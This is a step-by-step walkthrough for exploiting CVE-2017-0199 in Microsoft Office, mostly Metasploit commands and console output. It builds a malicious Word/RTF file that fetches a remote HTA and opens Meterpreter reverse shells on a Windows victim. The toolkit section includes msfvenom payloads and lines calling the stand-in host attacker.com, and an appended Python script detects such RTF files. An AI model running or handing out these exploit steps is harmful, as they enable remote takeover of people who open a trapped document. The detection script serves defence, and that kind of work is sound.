0x01 Via Metasploit

References

Preparation

Update MSF to the latest version.

Download the corresponding exploit:
cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

Download the RTF file:
cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

Start the HTA server:
msf > use exploit/windows/misc/hta_server 
msf exploit(hta_server) > show options 
Module options (exploit/windows/misc/hta_server):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Exploit target:
   Id  Name
   --  ----
   0   Powershell x86
msf exploit(hta_server) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Using URL: http://0.0.0.0:8080/5Fzi0vL.hta
[*] Local IP: http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(hta_server) > [*] Server started.
msf exploit(hta_server) >

Generate the payload:
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > show options 
Module options (exploit/windows/fileformat/office_word_hta):
   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf exploit(office_word_hta) > set TARGETURI http://10.14.81.6:8080/5Fzi0vL.hta
TARGETURI => http://10.14.81.6:8080/5Fzi0vL.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run
[+] msf.doc stored at /root/.msf4/local/msf.doc
msf exploit(office_word_hta) >

Copy the generated msf.doc file to the Windows machine; opening it yields a session.

msf exploit(office_word_hta) > 
[*] 10.14.89.247     hta_server - Delivering Payload
[*] 10.14.89.247     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:10576) at 2017-04-19 21:58:03 +0800
msf exploit(office_word_hta) > sessions -i
Active sessions
===============
  Id  Type                     Information       Connection
  --  ----                     -----------       ----------
  1   meterpreter x86/windows  hp-PC\hp @ HP-PC  10.14.81.6:4444 -> 10.14.89.247:10576 (10.14.89.247)
msf exploit(office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows

0x02 Via the Toolkit

Preparation

Download the Toolkit.

Generate the payload:
python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

Generate the Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

Start the HTA server:
python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

A shell is received once the victim opens the document.

[*] Started reverse TCP handler on 10.14.81.6:4444 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.14.89.247
[*] Meterpreter session 1 opened (10.14.81.6:4444 -> 10.14.89.247:12775) at 2017-04-19 23:09:03 +0800
meterpreter > sysinfo
Computer        : HP-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > screenshot 
[-] stdapi_ui_desktop_screenshot: Operation failed: Access is denied.
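As an added defender-side example (not code from the original post, the Metasploit module or the toolkit), the following Python heuristic flags RTF documents of the kind both sections above generate: an embedded OLE object marked to refresh when the document opens whose object data links to a remote HTA. The control-word check, the UTF-16LE URL search and the constructed sample document are this example's own assumptions.

```python
import re

# Heuristic for the RTF produced in this write-up: an \object group carrying
# \objupdate and/or \objautlink (refresh the link on open) whose \objdata hex
# blob contains a remote http(s) URL. The OLE2Link moniker stores that URL as
# UTF-16LE, so the search pattern is written in that encoding.

OBJ_GROUP = re.compile(r"\\object\b.*?\\objdata\s*([0-9a-fA-F\s]+)", re.DOTALL)
REMOTE_URL = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00", re.IGNORECASE)
AUTO_UPDATE_WORDS = ("\\objautlink", "\\objupdate")


def decode_objdata(hexblob: str) -> bytes:
    """Strip whitespace from the \\objdata hex run and decode it to bytes."""
    cleaned = re.sub(r"\s+", "", hexblob)
    return bytes.fromhex(cleaned[: len(cleaned) - len(cleaned) % 2])


def utf16_cstring(buf: bytes) -> str:
    """Decode a NUL-terminated UTF-16LE string that starts at buf[0]."""
    units = []
    for i in range(0, len(buf) - 1, 2):
        if buf[i:i + 2] == b"\x00\x00":
            break
        units.append(buf[i:i + 2])
    return b"".join(units).decode("utf-16-le", "replace")


def scan_rtf(data: bytes) -> list:
    """Return one finding per \\object group that auto-updates and links to a remote URL."""
    text = data.decode("latin-1")  # RTF is 7-bit ASCII; latin-1 keeps offsets 1:1
    findings = []
    for m in OBJ_GROUP.finditer(text):
        words = [w for w in AUTO_UPDATE_WORDS if w in m.group(0)]
        blob = decode_objdata(m.group(1))
        hit = REMOTE_URL.search(blob)
        if words and hit:
            findings.append({"url": utf16_cstring(blob[hit.start():]),
                             "auto_update_words": words})
    return findings


def build_sample(url: str, auto_update: bool = True) -> bytes:
    """Constructed, non-functional RTF that carries only the indicator structure above."""
    blob = b"\x00" * 8 + url.encode("utf-16-le") + b"\x00\x00" + b"\x00" * 4
    ctrl = "".join(AUTO_UPDATE_WORDS) if auto_update else ""
    return ("{\\rtf1{\\object" + ctrl + "\\objw1\\objh1{\\*\\objdata "
            + blob.hex() + "}}}").encode("ascii")


SAMPLE_URL = "http://198.51.100.7:8080/update.hta"  # constructed, documentation-range address
```

Run `scan_rtf(open(path, "rb").read())` over a suspect .doc/.rtf; an empty list means neither indicator was found, and a hit reports the remote URL the document would fetch on open.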